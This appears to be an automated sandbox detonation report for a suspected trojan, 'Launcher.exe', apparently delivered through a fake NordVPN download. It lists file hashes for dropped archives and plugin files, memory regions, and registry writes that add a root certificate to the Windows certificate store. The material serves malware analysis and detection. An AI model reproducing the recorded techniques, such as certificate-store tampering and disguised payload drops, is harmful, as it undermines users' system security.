C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2392-4464-0x0000000004A20000-0x0000000004A30000-memory.dmp

memory/1800-4468-0x0000000000400000-0x00000000008F2000-memory.dmp

memory/2392-4472-0x0000000004A20000-0x0000000004A30000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\01plugins16318.rar

MD5 e5e2d68307b34f409a92ef7669837322
SHA1 ee6cf43a96cac8e36f8b8dd06c826d428063f1d5
SHA256 d4032168bf6b6de3d4f936c03d947fe6524ced7cca91bbc2134bbf8fbc834cce
SHA512 b9ed94940194dcdddab7230db7d6ccf527e5bff4c9f822a553430f19d0f172a5d4fe1052a69ca19afd394f52ee9953a0f61afaf3447bd927b3b94114e505b2c5

C:\Users\Admin\AppData\Roaming\services\plugin16904

MD5 c233a13f928f3d16c08b4ce9231dd11e
SHA1 01f011955763cd6b25d8c2b463c42d2339807737
SHA256 bceda9a1bbaa1b5e4353c64f7a95fc00e757872cbfc67f2ee1aa2f501c7a0ae0
SHA512 6e6192e46b3089e7fa3d320a5457a023cf210f4a2fb41378f9a9c84aacd7c1f5f7efdbfc6b322a7f2e7916b9a18961cd320fd49f24a9ac1448ae56cd426e5ba5

C:\Users\Admin\AppData\Roaming\services\.wget-hsts

MD5 249e2716b9617321571ec649761b6c55
SHA1 9aa9ce93d585744b92c3a66f70b84cd0965ac2cb
SHA256 d0ba8b6245274e17cd9fabb2d9eb654d9a9db39a7c494c8eb3339e03fde9b988
SHA512 ea2d7f3fd57d14039a1c1ebb824a870efd8e765e13f126ee742e0a73a3bde832ab6f6e36a41d77f381a33a86af4e16c14e4be12abf259592bdc8e2bfa3731b10

memory/3700-4484-0x0000000000820000-0x0000000000920000-memory.dmp

memory/3700-4485-0x00000000021D0000-0x000000000222A000-memory.dmp

memory/3700-4486-0x0000000000400000-0x000000000056A000-memory.dmp

memory/3700-4487-0x0000000003400000-0x0000000003800000-memory.dmp

memory/3700-4488-0x0000000003400000-0x0000000003800000-memory.dmp

memory/3700-4489-0x0000000003400000-0x0000000003800000-memory.dmp

memory/3700-4491-0x0000000003400000-0x0000000003800000-memory.dmp

memory/3700-4490-0x00007FFF0CD30000-0x00007FFF0CF25000-memory.dmp

memory/3700-4493-0x00000000774A0000-0x00000000776B5000-memory.dmp

memory/5772-4494-0x0000000000130000-0x0000000000139000-memory.dmp

memory/5772-4496-0x0000000001E80000-0x0000000002280000-memory.dmp

memory/5772-4497-0x0000000001E80000-0x0000000002280000-memory.dmp

memory/5772-4500-0x0000000001E80000-0x0000000002280000-memory.dmp

memory/5772-4501-0x00000000774A0000-0x00000000776B5000-memory.dmp

memory/3700-4502-0x0000000000400000-0x000000000056A000-memory.dmp

memory/3700-4503-0x00000000021D0000-0x000000000222A000-memory.dmp

memory/3700-4504-0x0000000003400000-0x0000000003800000-memory.dmp

memory/5772-4498-0x00007FFF0CD30000-0x00007FFF0CF25000-memory.dmp

memory/5772-4505-0x0000000001E80000-0x0000000002280000-memory.dmp

memory/5192-4508-0x0000000000400000-0x00000000008F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

MD5 5e4bed1f03eaf955f34fb7aac08e1ea9
SHA1 25995351caff180c6054845dbb065ad15c35f502
SHA256 d24273e54ee82454ed6a49fad5c3e6ff593121ed45ebb6a88b7b36de994e67af
SHA512 e06a0b7be4941d9790455b71350fba0dc5cda3c18c61bd3d365da986a92585e42d57a0d723b6aef19c1c173208cd310b74096b77aaea8aa1590e4a33e848b9bb

C:\Users\Admin\AppData\Roaming\services\02plugins22289.rar

MD5 72aa5a9a19666e3a55e01e1d601c427e
SHA1 568a2a9d127b3c36723c5a906c0558862a64f2ae
SHA256 8ff970c1c22841e952b43f4d3cb8c1eb5e950d8d07a6f3d63d9ed02decd81492
SHA512 e5d23c418286b065f3e17af6b32eaa7140d22f7c78e9e564702a4c9bb34d7fd8480409217133c682aa0b30d59bdb4743feb0774330e5d9219276fa52af206f3e

C:\Users\Admin\AppData\Roaming\services\2plugin20718

MD5 098f0b6b6cfa12d01ee4c84aeb790a0e
SHA1 15c4be833af1c5ec6eae1cc9e860de30fb625895
SHA256 21c8a15270b17d16ed2bfb0b0522a59515c1991ccb4489cc374edb884dddc6b5
SHA512 882633c26faf013036bcaa756d2c8ff45b5826d5c9e2cf7e679ca4df25ac00b1b563e88375f05ae1f86b41becd5af9385ce345bbb12f4d3d1dc2e21e66a3a8c6

C:\Users\Admin\AppData\Roaming\services\.wget-hsts

MD5 221a8c261f9722171aee46f3cbc4c268
SHA1 02c211e3f4d547fddb1e3a375892198e485ee41d
SHA256 bf3b7fbb8af24192c830d43bf157f40c12dbe86bce239742fce9af712f6c0630
SHA512 667231be15354f00b7cee4c8f3047dab69f37e4e5ead2b7acfc3d72246f4131433cf6af5c89952933adc06699ea4d9a4b59ea8b22dfaa0a8d4afc123dfdab385

memory/1160-6895-0x00007FF648450000-0x00007FF64930F000-memory.dmp

memory/1160-6963-0x00007FFF0CF30000-0x00007FFF0CF32000-memory.dmp

memory/1160-7040-0x00007FFF0CF40000-0x00007FFF0CF42000-memory.dmp

memory/1160-7149-0x00007FF648450000-0x00007FF64930F000-memory.dmp

memory/1672-8520-0x0000000000400000-0x00000000008F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\03plugins20500.rar

MD5 e0ee8a8e48b04842a4434c1b61b7a0eb
SHA1 4d818c5553ac1a143ed779a231e097031e9861ab
SHA256 b4035a9802d9780599901c0a857ecbf9c01c0b6649ba50149c54bc020cd543be
SHA512 edf098b9eecb42d4b3747fbd84b564ae30af4d8bb6724e0ec6309d69f15173fb8008d8db05050344aadba71038ea005fed99f7658d4a337b176ffa28ca124dad

C:\Users\Admin\AppData\Roaming\services\3plugin16826

MD5 e6b9e5284ebbee453b064a4a69dc4ac8
SHA1 e7f7c669e671518cf64e8abe0ee461c016752446
SHA256 ecd35974505db0e7b6f99a14f088856acfe1ed674305d738383957e13b1b4614
SHA512 bc0b7e6bdafde1bd071705a4dc7b3af51a4c1e4c75865a76ea4ee1e319d1b116c7977f0ea1833581cc78688873c2253d5a613e2e9a10a51406c86bde4d3f535b

memory/5940-8529-0x0000000000630000-0x0000000000730000-memory.dmp

memory/5940-8530-0x0000000002240000-0x00000000022AC000-memory.dmp

memory/5940-8531-0x0000000000400000-0x0000000000562000-memory.dmp

C:\Users\Admin\Downloads\NordVPN-10_11\data\0a7TilYbj59R

MD5 8fd9587175089a28f343787c5584ba78
SHA1 4ed5968257f4da2e8745456809a775f86e03378b
SHA256 7c419ed0d315faf4e9e3c8a0060bfae24030e619dc1de2ca224e8e3f98c176c8
SHA512 e9e0b00d07eda323fc76eac1dff83cfebfaa9f7760f0b83fe82a9e7c513a54b631d2b98e2cee0ca81015136812e8e4472d1f89964eda8f9fb5e723b51e1a5383

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\KzudmJin6lXi

MD5 c92fed2e8824ebe59b2b38310ea3fe8d
SHA1 9d146f2ab0e98890a378a65c552a36590fcad271
SHA256 1702cc8523a4361f705cf02ea1bb747eec81d74a649dfac30385504ba941447b
SHA512 12364fd7996b2a8542812b546d13c861b653e7608dafc8ef9c729603d951d98fd14a3cc242a523b7e51927deca7a883f0e671fb8a7871f45306066ac2454ef85

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\M2oXKqJw7kuL

MD5 a526b31d99b1d923ffa55ae90bfce68b
SHA1 7701b458645c22ee2070aa8ed91e145c355d720c
SHA256 5b055c8fd3c52659e9f0de6edc6a03e03b1f26860542320aba89fa9c6e96db55
SHA512 331bd378fb0b5e638a9743c5232d6976b62ce680cb5d7a195db6523931ad1d63271652acab090af89b47768d68feb32d00b1c9b6d8823a0ec7fbac570a706c2c

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\n7j7W2HpDlaV

MD5 d256df0128142c2786f16867b624c3ae
SHA1 2abfaa61c522cfd683897ffd4188163454eecd96
SHA256 1fdb08358bf31fcfcd7abe16ff3dc62f44f46a5a0f76daca3254700c777ca87f
SHA512 12bdf93b02d8566b10d77b2b5c4134d74ce8df7eb2bf270c9f8cc138122f928ff05df03da8060820391ad5014f643ae3b3d71e819bbfd44a561b55edfcfc9500

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\o9pCvu9gJvgd

MD5 8e1766890ebee89d299d77795481045e
SHA1 dfdbe4314b015934f06cd79ae28a23533c52f5ef
SHA256 1b66f36687244cf205ec6b578a1d6271a973e68691b4deaa0304710f8c2993d8
SHA512 a39dc28048f8e6216a7cbdc10ce9a058c7657b4a72967956a5535573b9438172dde55084c96519fcda2f3bbe24389b755cc9f141eefd983ab2b0bb375ed6369f

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\P1pLxqSzXgRg

MD5 1355fc586770db90ea21cbe6b89fe845
SHA1 a9883ef24e93541ca9d45a970473ec5780533b71
SHA256 19814dcc1fca8141bacdb44feee963a9f5ecec810df659edf1fff8a17913e2d4
SHA512 489e58d00d5202027ae88a804e7353a3474e128c1b5b59e5a0c74beb33752973f854fcbcfa1bb089f202fb98513bf5f4c260ed4fd8dd9f53a8a056c093e0a6e9

memory/5940-9037-0x0000000000400000-0x0000000000562000-memory.dmp

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\PAD0IZ9SNxru

MD5 1ad79d8978eb39916bfcf12201a8a8d4
SHA1 47b067f53e1073dde9d1f0fed81f318e02cc8e39
SHA256 4cebcd0162c2f388827417c21e47f5e3d927f23d2c576d0e19caf0afb12adc5c
SHA512 56edf45b83e69e04714865fffe7f8dafa87a71e900344049ad8533c4b71a844ee3e51790750a1c4d73702fcf00a17fd44d11f6eae6b6dfcd67c49b3b515aeaa9

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\p0MXLhfTaaTv

MD5 c2008f9e264dff5507f28d98a7c39adb
SHA1 ea0e0832cc5d674fd865a172bd7efb059cee01a5
SHA256 c71db89c455ac2fa22f5bd633fbf626e3408a1f971d5d995297f4b000185541e
SHA512 daeace12ae8ae14db376a172888dd80b869bea80156916d0d445794ffe36df90e802de2fae7d5d5909dbfff30bea36c12f71ef5e79a4074262f76e43c649435e

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\panO8aCTk5I7

MD5 616c497096de4050a299319be120f5bc
SHA1 2a0cbda932a6c0538250164f901071e522cd7653
SHA256 2877aff346a38b1afd76787b1ecd6599ed240476b543e76af19b918a2c8a0c22
SHA512 6d4066a41c39a1f99d169ab87eeca14119897c0d65bb10d1463ee8686cc5fce56511f1e363598aa84b0c9a4378cc31907941eaa9859d9886cd2364928e64b917

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\QCL4gEKNdU1S

MD5 fcee1f14b6562ab24043771ac999f806
SHA1 7125492798f3406487ce92d8ff8950d88f28df4f
SHA256 888833093ce9e18582058d3b42934b6754e78bbe5d8ffdb9495a5e821a489bb4
SHA512 fd9aed4ccc693145ea93a5460f8fbcdd65b08a2104860ba8001c249b7378c3feae8624a9e1ab82cfd71064cec83f963c8433feb3fa1d3a4245093ac7b1382bbb

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\R9ZPoAQYj89y

MD5 10c4e5d338db97ab7b4a3bc0ca2672a8
SHA1 cbe2dc263ee124f456b2205c98d7170c92539aac
SHA256 7a03c78f8fc9a3028b7dc9df310899167a746436269e4a57c5c7169bc92298cb
SHA512 063706278090f37b1763f5b3845f666aa0cf190004ad19d4e8ae22b4a08c076f46b26dd4cababe09cd77a4fa970092ee4c067ca2cf1e20455dc29f76af9cd295

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\RNUU6CGBfA6w

MD5 547cb043292307f7407470346e1ae2d1
SHA1 83b09087aacdfc486481ecaf3124a5c0d64f1481
SHA256 adf0004ea7a42c9724170f0c321b91a6a1bccdc0f06ae49bb6bbb8c8d54246ff
SHA512 e3cf902b9158a8ecb7e208a53a27d9bfe1e2424497922e29eac8849001376ad23dfa7457dc4d6d761cdb2f644570431e0bc4573c6239910486548627883463fb

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-29 14:54

Reported

2024-03-29 14:58

Platform

win11-20240221-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

Signatures

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Launcher.exe

"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A